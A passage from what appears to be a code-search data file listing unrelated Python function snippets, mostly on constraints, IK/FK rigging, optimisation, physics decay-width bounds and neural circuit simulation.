softbounds=softbounds)\n assert num_a.value == value\n assert num_a.softbounds == softbounds", "def constraint(self, c):\n self.add_constraint(c)", "def pre_network_ipam_create(self, resource_dict):\n pass", "def pre_network_policy_create(self, resource_dict):\n pass", "def pre_virtual_ip_create(self, resource_dict):\n pass", "def ikfkMechanics(module, extraName, jnts, mechSkelGrp, ctrlGrp, moduleType, rig):\n jntSuffix = suffix['joint']\n newJntChains = []\n ## create duplicate chains\n for chain in ['IK', 'FK']:\n newJnts = utils.duplicateJntChain(chain, jnts, parent=mechSkelGrp.name)\n newJntChains.append(newJnts)\n ikJnts = newJntChains[0]\n fkJnts = newJntChains[1]\n for i, each in enumerate(jnts):\n newName = '{}_result{}'.format(each.rsplit('_', 1)[0], jntSuffix)\n jnts[i] = cmds.rename(each, newName)\n # utils.addJntToSkinJnt(jnts[i], rig=rig)\n ## settings control\n module.settingCtrl = ctrlFn.ctrl(name='{}{}Settings'.format(extraName, moduleType),\n guide='{}{}Settings{}'.format(module.moduleName,\n moduleType, suffix['locator']),\n deleteGuide=True, side=module.side, skipNum=True,\n parent=module.rig.settingCtrlsGrp.name,\n scaleOffset=rig.scaleOffset, rig=rig)\n if moduleType == 'arm':\n settingJnt = jnts[3]\n else:\n settingJnt = jnts[2]\n module.settingCtrl.makeSettingCtrl(ikfk=True, parent=settingJnt)\n ## parent constraints\n for jnt, ikJnt, fkJnt in zip(jnts, ikJnts, fkJnts):\n parConstr = cmds.parentConstraint(ikJnt, fkJnt, jnt)\n cmds.connectAttr(module.settingCtrl.ctrl.ikfkSwitch, '{}.{}W1'.format(parConstr[0], fkJnt))\n swRev = utils.newNode('reverse', name='{}{}IKFKSw'.format(extraName, moduleType),\n side=module.side)\n swRev.connect('inputX', module.settingCtrl.ctrl.ikfkSwitch, mode='to')\n swRev.connect('outputX', '{}.{}W0'.format(parConstr[0], ikJnt), mode='from')\n ## control vis groups\n ikCtrlGrp = utils.newNode('group', name='{}{}IKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n fkCtrlGrp = utils.newNode('group', name='{}{}FKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.999, v=1)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=1, v=0)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.001, v=1)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0, v=0)\n return ikJnts, fkJnts, jnts, ikCtrlGrp, fkCtrlGrp", "def add_constraint(self, kind, hook, expr, queue=False,**kwargs):\n\n if isinstance(expr, GenericVariable):\n # make sure we actually pass the optlang variable\n expr = expr.variable\n\n # Initialisation links to the cobra_model\n cons = kind(hook, expr, # problem = self.problem,\n # lb=lower_bound if lower_bound != float('-inf') else None,\n # ub=upper_bound if upper_bound != float('inf') else None,\n queue=queue,\n **kwargs)\n self._cons_dict[cons.name] = cons\n self.logger.debug('Added constraint: {}'.format(cons.name))\n # self.add_cons_vars(cons.constraint)\n\n return cons", "def soft_validation(self, soft_validation):\n\n self._soft_validation = soft_validation", "def soft_validation(self, soft_validation):\n\n self._soft_validation = soft_validation", "def _create_softmax(cls, onnx_node, inputs, opset_version):\n factor = onnx_node.getattr('axis', 1)\n if factor < 0:\n # in order to support the negative axis\n factor = len(inputs[0].shape) + factor\n _, forward = cls._common_onnx_node_to_singa_op(onnx_node, inputs,\n opset_version)\n return None, forward(axis=factor)", "def constraint_k_pi_invis(self):\n width_contr = 0.0\n ms = self.ms\n\n # Make sure scalar mass doesn't fall outside of kinematic bounds\n if np.any([s[0] <= ms**2 <= s[1] for s in k_pi_invis_obs.s_bounds]):\n widths_s = self.partial_widths()\n width_s = widths_s[\"total\"]\n width_s_sm = width_s - widths_s[\"x x\"] # Gamma_{S->SM}\n\n # Magnitude of S' 3-momentum\n ps = np.sqrt(\n (mk - mpi - ms) * (mk + mpi - ms) * (mk - mpi + ms) * (mk + mpi + ms)\n ) / (2.0 * mk)\n # Probability that S decays outside the detector\n pr_invis = np.exp(-k_pi_invis_obs.r_max * cm_to_inv_MeV * width_s * ms / ps)\n\n # Compute the total contribution to the invisible decay width\n width_contr = (\n self.width_k_pi_s() * (widths_s[\"x x\"] + pr_invis * width_s_sm) / width_s\n )\n\n return k_pi_invis_obs.width_bound - width_contr", "def ikHandleCtx(*args, autoPriorityH: bool=True, createCurve: bool=True, createRootAxis:\n bool=True, exists: bool=True, forceSolverH: bool=True, history: bool=True,\n image1: Union[AnyStr, bool]=\"\", image2: Union[AnyStr, bool]=\"\", image3:\n Union[AnyStr, bool]=\"\", name: AnyStr=\"\", numSpans: int=1, parentCurve:\n bool=True, poWeightH: Union[float, bool]=1, priorityH: Union[int, bool]=1,\n rootOnCurve: bool=True, rootTwistMode: bool=True, simplifyCurve: bool=True,\n snapCurve: bool=True, snapHandleH: bool=True, solverTypeH: Union[AnyStr,\n bool]=\"\", stickyH: Union[AnyStr, bool]=\"off\", twistType: AnyStr=\"linear\",\n weightH: Union[float, bool]=1, q=True, query=True, e=True, edit=True,\n **kwargs)->Union[AnyStr, Any]:\n pass", "def __init__(self, constraint: ConstraintExpr):\n self.constraint = constraint", "def create_dummy_expression(penalty_variable, constraint_variable):\n return expression.ExplicitExpression(\n basic_expression.BasicExpression([term.TensorTerm(penalty_variable)]),\n basic_expression.BasicExpression(\n [term.TensorTerm(constraint_variable)]))", "def test_create_hyperflex_ext_iscsi_storage_policy(self):\n pass", "def pre_floating_ip_create(self, resource_dict):\n pass", "def test_create_hyperflex_software_version_policy(self):\n pass", "def test_patch_hyperflex_auto_support_policy(self):\n pass", "def add_constraint(self, constraint):\n self._ckey += 1\n self.constraints[self._ckey] = constraint", "def pre_floating_ip_pool_create(self, resource_dict):\n pass", "def fit_DTI_signal(sig, x, weighted=False, x_pinv=None, is_log_sig=False, h_hat=None, inv_levs=None):\n if is_log_sig:\n y = sig\n else:\n #log SIGNAL\n #this assumes that sig is strictly positive!!!!\n try:\n y = np.log(sig)\n except RuntimeWarning as rw:\n print 'ERROR FIT: non-positive value in signal'\n print rw, '\\nsignal', sig\n raise rw\n #beta0=np.linalg.lstsq(DESIGNMATRIX,y)[0]\n #pseudo inverse z = (DESIGNMATRIX*xT)^(-1)*xT\n if x_pinv is None:\n z = designmatrix_pseudoinverse(x)\n else:\n z = x_pinv\n #compute hat matrix H diagonal, H = DESIGNMATRIX*z\n #in whitcher et al 2008 the H_diagonal is computed from the OLS regression\n if h_hat is None:\n H_diag = np.diagonal(np.dot(x, z))\n else:\n H_diag = h_hat\n #beta0 is the least squares fit result, beta0 = z*y\n beta0 = np.dot(z, y)\n if weighted:\n #generate synthetic SIGNAL\n try:\n Sg = np.exp(np.dot(x, beta0))\n except RuntimeWarning as rw:\n print 'ERROR FIT: generating synthetic signal'\n print rw, '\\ndesign matrix',x, '\\ntensor OLS fit' , beta0\n raise rw\n \n #compute weight matrix W\n try:\n W = generate_weights(Sg)\n except RuntimeWarning as rw:\n print 'ERROR FIT: generating weights'\n print rw, '\\nsynthetic signal', Sg\n raise rw\n #do IS_WEIGHTED fit \n #z = designmatrix_pseudoinverse(x, W) #np.dot(np.dot(np.linalg.inv(np.dot(DESIGNMATRIX.T,np.dot(W,DESIGNMATRIX))),DESIGNMATRIX.T),W)\n #beta is the final IS_WEIGHTED matrix\n #beta = np.dot(z, y)\n #linalg.lstsq wraps the function lapack_lite.dgelsd see some information on lapack dgelsd... That explains why the linalg calls the routine twice\n# LWORK (input) INTEGER\n# The dimension of the array WORK. LWORK must be at least 1. \n# The exact minimum amount of workspace needed depends on M, N and NRHS. \n# As long as LWORK is at least 12*N + 2*N*SMLSIZ + 8*N*NLVL + N*NRHS + (SMLSIZ+1)**2, \n# if M is greater than or equal to N or 12*M + 2*M*SMLSIZ + 8*M*NLVL + M*NRHS + (SMLSIZ+1)**2, \n# if M is less than N, the code will execute correctly. \n# SMLSIZ is returned by ILAENV and is equal to the maximum size of the subproblems at \n# the bottom of the computation tree (usually about 25), and NLVL = MAX( 0, INT( LOG_2( MIN( M,N )/(SMLSIZ+1) ) ) + 1 ) \n# For good performance, LWORK should generally be larger. \n# If LWORK = -1, then a workspace query is assumed; \n# the routine only calculates the optimal size of the WORK array, returns this value as the first entry of \n# the WORK array, and no error message related to LWORK is issued by XERBLA. \n# IWORK (workspace) INTEGER array, dimension (MAX(1,LIWORK)) LIWORK >= 3 * MINMN * NLVL + 11 * MINMN, where MINMN = MIN( M,N ). \n #tfit = np.linalg.lstsq(np.dot(x.T, np.dot(W,x)), np.dot(x.T, np.dot(W, y)))[0]\n #use faster diagonal matrix mul routine\n tmpfac = mult_diag(W, x.T, False)\n# tfit = np.linalg.lstsq(np.dot(tmpfac, x), np.dot(tmpfac, y))[0]\n try:\n tfit = np.linalg.solve(np.dot(tmpfac, x), np.dot(tmpfac, y))\n except np.linalg.LinAlgError as e:\n tfit = np.linalg.lstsq(np.dot(tmpfac, x), np.dot(tmpfac, y))[0]\n print 'fit_DTI_signal: Warning using lstsq', e\n# print e, '\\ntensor fit', f_s[0]\n else:\n tfit = beta0\n #compute hat matrix H diagonal, H = DESIGNMATRIX*z\n #in whitcher et al 2008 the H_diagonal is computed from the OLS regression\n #H_diag = np.diagonal(np.dot(x, z))\n #compute MU\n mu = np.dot(x, tfit)\n #compute log residuals\n errors = y-mu\n if inv_levs is None:\n try:\n \n #the resampling is only done on the gradient directions, not on the logS component!\n inv_levs = np.ones(errors.shape)\n inv_levs[1:] = 1./np.sqrt(1.-H_diag[1:]) \n \n except RuntimeWarning as rw2:\n print 'ERROR FIT: leveraged errors'\n print rw2, '\\nHat matrix diagonal', H_diag\n inv_levs = np.ones(errors.shape)\n raise rw2\n lev_errors = errors*inv_levs \n return (tfit, mu, errors, H_diag, lev_errors)", "def constraint_B_k_invis(self):\n ms = self.ms\n width_contr = 0.0\n\n # Make sure scalar mass doesn't fall outside of kinematic bounds\n if np.any([s[0] <= ms**2 <= s[1] for s in B_k_invis_obs.s_bounds]):\n widths_s = self.partial_widths()\n width_s = widths_s[\"total\"]\n width_s_sm = width_s - widths_s[\"x x\"] # Gamma_{S->SM}\n\n # Magnitude of S' 3-momentum\n ps = np.sqrt(\n (mB - mk - ms) * (mB + mk - ms) * (mB - mk + ms) * (mB + mk + ms)\n ) / (2.0 * mB)\n # Probability that S decays outside the detector\n pr_invis = np.exp(-B_k_invis_obs.r_max * cm_to_inv_MeV * width_s * ms / ps)\n\n # Compute the total contribution to the invisible decay width\n width_contr = (\n self.width_B_k_s() * (widths_s[\"x x\"] + pr_invis * width_s_sm) / width_s\n )\n\n return B_k_invis_obs.width_bound - width_contr", "def constraints(self):\n # Turn softmax output to categories.\n predictions = (1 + tf.sign(self.predictions)) / 2\n\n # Set the constraint to zero.\n self.constraint = 0\n ct = list()\n\n # Compute DIDI constraint.\n for I in self.I_train:\n N = tf.reduce_sum(tf.cast(I >= 0, dtype=tf.float32))\n Np = tf.reduce_sum(I)\n a = (tf.reduce_sum(predictions) / N)\n b = (tf.reduce_sum(I * predictions) / Np)\n\n tmp = tf.cond(Np > 0, lambda: 2 * (a - b), lambda: 0.0)\n ct.append(tf.abs(tmp))\n\n # ConstrainedMinimizationProblems must always provide their constraints in\n # the form (tensor <= 0).\n # return self.constraint - self.constraint_value\n return sum(ct) - self.constraint_value", "def soft_update(self, other, tau):\n new_weights = {}\n\n own_weights = self.get_weight_copies()\n other_weights = other.get_weight_copies()\n\n for k in own_weights:\n #print(own_weights[k].shape, other_weights[k].shape)\n new_weights[k] = (1 - tau) * own_weights[k] + tau * other_weights[k]\n self.set_weights(new_weights)", "def _discretize(self, constraints_object):\n pass", "def constraint_val(self, input_val_dict):\n\n sess = tf.get_default_session()\n feed_dict = self.create_feed_dict(input_val_dict)\n constrain_val = sess.run(self._constraint_objective, feed_dict)\n return constrain_val", "def _createConstraint(self, dvIndex, compIDs, lbound, ubound):\n size = self.comm.size\n rank = self.comm.rank\n # Gather the dv mapping from each proc\n globalToLocalDVNumsOnProc = self.comm.gather(self.globalToLocalDVNums, root=0)\n # Assemble constraint info on root proc\n if rank == 0:\n # Create a list of lists that will hold the sparse data info on each proc\n rowsOnProc = [[] for _ in range(size)]\n colsOnProc = [[] for _ in range(size)]\n valsOnProc = [[] for _ in range(size)]\n conCount = 0\n foundCompPairs = []\n # Loop through all adjacent component pairs\n for compPair in self.adjacentComps:\n # Check if they are in the user provided compIDs\n if compPair[0] in compIDs and compPair[1] in compIDs:\n # Add comp pair to list\n foundCompPairs.append(compPair)\n # We found a new constraint\n for i, comp in enumerate(compPair):\n # Get the TACS element object associated with this compID\n elemObj = self.meshLoader.getElementObject(comp, 0)\n elemIndex = 0\n # Get the dvs owned by this element\n globalDvNums = elemObj.getDesignVarNums(elemIndex)\n # Check if specified dv num is owned by each proc\n for proc_i in range(size):\n globalToLocalDVNums = globalToLocalDVNumsOnProc[proc_i]\n if globalDvNums[dvIndex] in globalToLocalDVNums:\n globalDVNum = globalDvNums[dvIndex]\n localDVNum = globalToLocalDVNums[globalDVNum]\n rowsOnProc[proc_i].append(conCount)\n colsOnProc[proc_i].append(localDVNum)\n if i == 0:\n valsOnProc[proc_i].append(1.0)\n else:\n valsOnProc[proc_i].append(-1.0)\n break\n conCount += 1\n\n else:\n rowsOnProc = None\n colsOnProc = None\n valsOnProc = None\n conCount = 0\n foundCompPairs = None\n\n # Scatter local sparse indices/values to remaining procs\n rows = self.comm.scatter(rowsOnProc, root=0)\n cols = self.comm.scatter(colsOnProc, root=0)\n vals = self.comm.scatter(valsOnProc, root=0)\n\n # Get local sparse matrix dimensions\n foundCompPairs = self.comm.bcast(foundCompPairs, root=0)\n conCount = self.comm.bcast(conCount, root=0)\n nLocalDVs = self.getNumDesignVars()\n\n constrObj = SparseLinearConstraint(\n self.comm, rows, cols, vals, conCount, nLocalDVs, lbound, ubound\n )\n constrObj.compPairs = foundCompPairs\n\n # Create linear constraint object\n return constrObj", "def ineqconstr(x, problem):\n x, t_final = matrify(x, problem)\n c = []\n\n # inter vehicles\n c += [veh_coll_avoid(x[:, :2, v1], x[:, :2, v2], problem)\n for v1 in range(problem['Nv']) for v2 in range(v1 + 1, problem['Nv'])]\n\n # obstacles\n c += [obs.avoid(x[:, :2, veh]) for obs in problem['obstacles'] for veh in range(problem['Nv'])]\n return np.concatenate(c) if c else np.array([])", "def test_creation_set_softbounds_get_softbounds():\n value = 42\n softbounds = [-100, 100]\n\n num_a = param.Integer(value=value, softbounds=softbounds)\n assert num_a.softbounds == softbounds\n assert num_a.get_soft_bounds() == softbounds", "def get_Amn_one_k(self, ik):\n raise NotImplementedError(\n \"The get_Amn_one_k method is should be overrided.\")", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def G(self, (k,t), (j,x), **params):\n d = len(x)/2\n q,dq = x[:d],x[d:]\n J = (j == True)\n _J = np.logical_not(J)\n # number of constraints\n n = len(J) \n # number of active constraints\n m = np.sum(J) # = n - len(a)\n a = self.a( (k,t), (_J,q), **params)\n lambda_ = self.lambda_( (k,t), (J,q,dq), **params)\n # unilateral constraint forces\n lambda_ = lambda_[:m] \n g = np.nan*np.zeros(n)\n g[_J] = a\n g[J] = lambda_\n return g", "def test_tensor_terms_have_constraints(toy_interaction_X_y):\n X, y = toy_interaction_X_y\n gam = LinearGAM(te(0, 1, constraints='none')).fit(X, y)\n\n assert gam._is_fitted\n assert gam.terms.hasconstraint", "def pre_logical_interface_create(self, resource_dict):\n pass", "def createGridWarpNodeMI():\n return gy()", "def pre_physical_interface_create(self, resource_dict):\n pass", "def regularize_if_necessary(self) -> None:\n # As described in [wang2014], all entities and relations are used to compute the regularization term\n # which enforces the defined soft constraints.\n super().regularize_if_necessary(\n self.entity_embeddings.weight,\n self.normal_vector_embeddings.weight,\n self.relation_embeddings.weight,\n )", "def fixed(input_dim, K, variance=1.):\r\n part = parts.fixed.Fixed(input_dim, K, variance)\r\n return kern(input_dim, [part])", "def constrained_softmax(input_tensor, b, temp):\n\n # input_tensor = tf.reduce_mean(input_tensor)\n z = tf.reduce_sum(tf.exp(input_tensor / temp), axis=1, keep_dims=True)\n a = tf.exp(input_tensor / temp) * (b / temp) / z\n # a = tf.exp(input_tensor/temp) * b / z\n u = tf.ones_like(b) - b\n t_mask = tf.to_float(tf.less_equal(a, u))\n f_mask = tf.to_float(tf.less(u, a))\n A = a * t_mask\n U = u * f_mask\n\n csoftmax = A + U\n\n return csoftmax", "def apply_default_constraints(self):\n try:\n self.apply_secthresh(pipeline_weaksec(self.koi))\n except NoWeakSecondaryError:\n logging.warning('No secondary eclipse threshold set for {}'.format(self.koi))\n self.set_maxrad(default_r_exclusion(self.koi))", "def generate_powerset_bridge_constraints(problem):\n\n c_30 = _dynamic_constraint_30(problem)\n c_33 = _dynamic_constraint_33(problem)\n c_34 = _dynamic_constraint_34(problem)\n c_35 = _dynamic_constraint_35(problem)\n c_36 = _dynamic_constraint_36(problem)\n\n return c_30 & c_33 & c_34 & c_35 & c_36", "def addConstraint(self, constraint: Constraint, /) -> None:\n ...", "def ikSystem(*args, allowRotation: bool=True, autoPriority: bool=True, autoPriorityMC:\n bool=True, autoPrioritySC: bool=True, list: Union[List[int, int], bool]=None,\n snap: bool=True, solve: bool=True, solverTypes: bool=True, q=True, query=True,\n e=True, edit=True, **kwargs)->Union[AnyStr, Any]:\n pass", "def addConstraint(constraint, problem):\n problem += constraint", "def create_fixed_distance_constraint():\n return FixedDistanceConstraint()", "def constraint(self, constraint):\n\n self._constraint = constraint", "def pre_virtual_DNS_create(self, resource_dict):\n pass", "def mk_intcircuit(task_info):\n # -------------------------------------\n # Decision circuit parameters\n # -------------------------------------\n # populations\n N_E = task_info['dec']['populations']['N_E'] # number of exc neurons (1600)\n N_I = task_info['dec']['populations']['N_I'] # number of inh neurons (400)\n sub = task_info['dec']['populations']['sub'] # fraction of stim-selective exc neurons\n N_D1 = int(N_E * sub) # size of exc pop D1\n N_D2 = N_D1 # size of exc pop D2\n N_D3 = int(N_E * (1 - 2 * sub)) # size of exc pop D3, the rest\n\n # local recurrent connections\n w_p = task_info['dec']['connectivity']['w_p'] # relative synaptic strength of synapses within pop D1 and D2\n w_m = 1 - sub * (w_p - 1) / (1 - sub) # relative synaptic strength of synapses across pop D1 and D2\n gEEa = task_info['dec']['connectivity']['gEEa'] # AMPA weight of EE synapses\n gEEn = task_info['dec']['connectivity']['gEEn'] # NMDA weight of EE synapses\n gEIa = task_info['dec']['connectivity']['gEIa'] # AMPA weight of EI synapses\n gEIn = task_info['dec']['connectivity']['gEIn'] # NMDA weight of EI synapses\n gIE = task_info['dec']['connectivity']['gIE'] # GABA weight of IE synapses, vs 1.3*nS from before\n gII = task_info['dec']['connectivity']['gII'] # GABA weight of II synapses\n d = task_info['dec']['connectivity']['delay'] # transmission delays of E synapses\n\n # external connections\n gXE = task_info['dec']['connectivity']['gXE'] # weight of XE (ext to exc) synapses\n gXI = task_info['dec']['connectivity']['gXI'] # weight of XI (ext to inh) synapses\n\n # neuron models\n CmE = task_info['dec']['neuron']['CmE'] # membrane capacitance of E neurons\n CmI = task_info['dec']['neuron']['CmI'] # membrane capacitance of I neurons\n gleakE = task_info['dec']['neuron']['gleakE'] # leak conductance of E neurons\n gleakI = task_info['dec']['neuron']['gleakI'] # leak conductance of I neurons\n Vl = task_info['dec']['neuron']['Vl'] # resting potential\n Vt = task_info['dec']['neuron']['Vt'] # spiking threshold\n Vr = task_info['dec']['neuron']['Vr'] # reset potential\n tau_refE = task_info['dec']['neuron']['tau_refE'] # absolute refractory period of E neurons\n tau_refI = task_info['dec']['neuron']['tau_refI'] # absolute refractory period of I neurons\n nu_ext = task_info['dec']['neuron']['nu_ext'] # firing rate of ext Poisson input to D1 and D2\n nu_ext1 = task_info['dec']['neuron']['nu_ext1'] # firing rate of ext Poisson input to D3 and DI\n\n # synapse models\n VrevE = task_info['dec']['synapse']['VrevE'] # reversal potential for E synapses\n VrevI = task_info['dec']['synapse']['VrevI'] # reversal potential for I synapses\n tau_ampa = task_info['dec']['synapse']['tau_ampa'] # decay constant of AMPA conductances\n tau_gaba = task_info['dec']['synapse']['tau_gaba'] # decay constant of GABA conductances\n tau_nmda_d = task_info['dec']['synapse']['tau_nmda_d'] # decay constant of NMDA conductances\n tau_nmda_r = task_info['dec']['synapse']['tau_nmda_r'] # rise constant of NMDA conductances\n alpha_nmda = task_info['dec']['synapse']['alpha_nmda'] # saturation constant of NMDA conductances\n\n # namespace with params\n paramint = {'w_p': w_p, 'w_m': w_m, 'gEEa': gEEa, 'gEEn': gEEn, 'gEIa': gEIa, 'gEIn': gEIn,\n 'gIE': gIE, 'gII': gII, 'gXE': gXE, 'gXI': gXI, 'gleakE': gleakE, 'gleakI': gleakI,\n 'Vl': Vl, 'Vt': Vt, 'Vr': Vr, 'VrevE': VrevE, 'VrevI': VrevI, 'tau_ampa': tau_ampa,\n 'tau_gaba': tau_gaba, 'tau_nmda_d': tau_nmda_d, 'tau_nmda_r': tau_nmda_r, 'alpha_nmda': alpha_nmda,\n 'sub': sub, 'CmE': CmE, 'CmI': CmI}\n\n # numerical integration method\n nummethod = task_info['simulation']['nummethod']\n\n # -------------------------------------\n # Set up the model and connections\n # -------------------------------------\n # neuron equations\n eqsE = '''\n dV/dt = (-g_ea*(V-VrevE) - g_ent*(V-VrevE)/(1+exp(-V/mV*0.062)/3.57) - g_i*(V-VrevI) - (V-Vl)) / tau : volt (unless refractory)\n dg_ea/dt = -g_ea / tau_ampa : 1\n dg_i/dt = -g_i / tau_gaba : 1\n dg_en/dt = -g_en / tau_nmda_d + alpha_nmda * x_en *(1-g_en) : 1\n dx_en/dt = -x_en / tau_nmda_r : 1\n g_ent : 1\n tau = CmE/gleakE : second\n label : integer (constant)\n '''\n\n eqsI = '''\n dV/dt = (-g_ea*(V-VrevE) - g_entI*(V-VrevE)/(1+exp(-V/mV*0.062)/3.57) - g_i*(V-VrevI) - (V-Vl)) / tau : volt (unless refractory)\n dg_ea/dt = -g_ea/tau_ampa : 1\n dg_i/dt = -g_i/tau_gaba : 1\n g_entI = w_nmda * g_ent : 1\n g_ent : 1 (linked)\n w_nmda : 1\n tau = CmI/gleakI : second\n '''\n\n # setup of integration circuit\n decE = NeuronGroup(N_E, model=eqsE, method=nummethod, threshold='V>=Vt', reset='V=Vr',\n refractory=tau_refE, namespace=paramint, name='decE')\n decE1 = decE[:N_D1]\n decE2 = decE[N_D1:N_D1 + N_D2]\n decE3 = decE[-N_D3:]\n decE1.label = 1\n decE2.label = 2\n decE3.label = 3\n\n decI = NeuronGroup(N_I, model=eqsI, method=nummethod, threshold='V>=Vt', reset='V=Vr',\n refractory=tau_refI, namespace=paramint, name='decI')\n\n # weight according the different subgroups\n condsame = '(label_pre == label_post and label_pre != 3)'\n conddiff = '(label_pre != label_post and label_pre != 3) or (label_pre == 3 and label_post != 3)'\n condrest = '(label_post == 3)'\n\n # NMDA: exc --> exc\n eqsNMDA = '''\n g_ent_post = w_nmda * g_en_pre : 1 (summed)\n w_nmda : 1 (constant)\n w : 1 (constant)\n '''\n\n synDEDEn = Synapses(decE, decE, model=eqsNMDA, method=nummethod, on_pre='x_en += w', delay=d,\n namespace=paramint, name='synDEDEn')\n synDEDEn.connect()\n synDEDEn.w['i == j'] = 1\n synDEDEn.w['i != j'] = 0\n synDEDEn.w_nmda[condsame] = 'w_p * gEEn/gleakE'\n synDEDEn.w_nmda[conddiff] = 'w_m * gEEn/gleakE'\n synDEDEn.w_nmda[condrest] = 'gEEn/gleakE'\n\n # NMDA: exc --> inh\n decI.w_nmda = '(gEIn/gleakI) / (gEEn/gleakE)'\n decI.g_ent = linked_var(decE3, 'g_ent', index=range(N_I))\n\n # AMPA: exc --> exc\n synDEDEa = Synapses(decE, decE, model='w : 1', method=nummethod,\n on_pre='g_ea += w', delay=d,\n namespace=paramint, name='synDEDEa')\n synDEDEa.connect()\n synDEDEa.w[condsame] = 'w_p * gEEa/gleakE'\n synDEDEa.w[conddiff] = 'w_m * gEEa/gleakE'\n synDEDEa.w[condrest] = 'gEEa/gleakE'\n\n # AMPA: exc --> inh\n synDEDIa = Synapses(decE, decI, model='w : 1', method=nummethod,\n on_pre='g_ea += w', delay=d,\n namespace=paramint, name='synDEDIa')\n synDEDIa.connect()\n synDEDIa.w = 'gEIa/gleakI'\n\n # GABA: inh --> exc\n synDIDE = Synapses(decI, decE, model='w : 1', method=nummethod,\n on_pre='g_i += w', delay=d,\n namespace=paramint, name='synDIDE')\n synDIDE.connect()\n synDIDE.w = 'gIE/gleakE'\n\n # GABA: inh --> inh\n synDIDI = Synapses(decI, decI, model='w : 1', method=nummethod,\n on_pre='g_i += w', delay=d,\n namespace=paramint, name='synDIDI')\n synDIDI.connect()\n synDIDI.w = 'gII/gleakI'\n\n # external inputs and connections\n extE = PoissonInput(decE[:N_D1 + N_D2], 'g_ea', N=1, rate=nu_ext1, weight='gXE/gleakE')\n extE3 = PoissonInput(decE3, 'g_ea', N=1, rate=nu_ext, weight='gXE/gleakE')\n extI = PoissonInput(decI, 'g_ea', N=1, rate=nu_ext, weight='gXI/gleakI')\n\n # variables to return\n groups = {'DE': decE, 'DI': decI, 'DX': extE, 'DX3': extE3, 'DXI': extI}\n subgroups = {'DE1': decE1, 'DE2': decE2, 'DE3': decE3}\n synapses = {'synDEDEn': synDEDEn,\n 'synDEDEa': synDEDEa, 'synDEDIa': synDEDIa,\n 'synDIDE': synDIDE, 'synDIDI': synDIDI} # 'synDEDIn': synDEDIn,\n\n return groups, synapses, subgroups", "def make_constraint(n_class):\n m = np.identity(n_class)\n m = np.vstack([m, np.ones(n_class)])\n\n lb = [epsilon] * n_class\n lb.append(1.0)\n ub = [1.0 - epsilon] * n_class\n ub.append(1.0)\n\n c = scipy.optimize.LinearConstraint(\n A=m,\n lb=lb,\n ub=ub,\n keep_feasible=True,\n )\n return c", "def ensure_default_constraints(self):\r\n positive_strings = ['variance', 'lengthscale', 'precision', 'decay', 'kappa']\r\n # param_names = self._get_param_names()\r\n currently_constrained = self.all_constrained_indices()\r\n to_make_positive = []\r\n for s in positive_strings:\r\n for i in 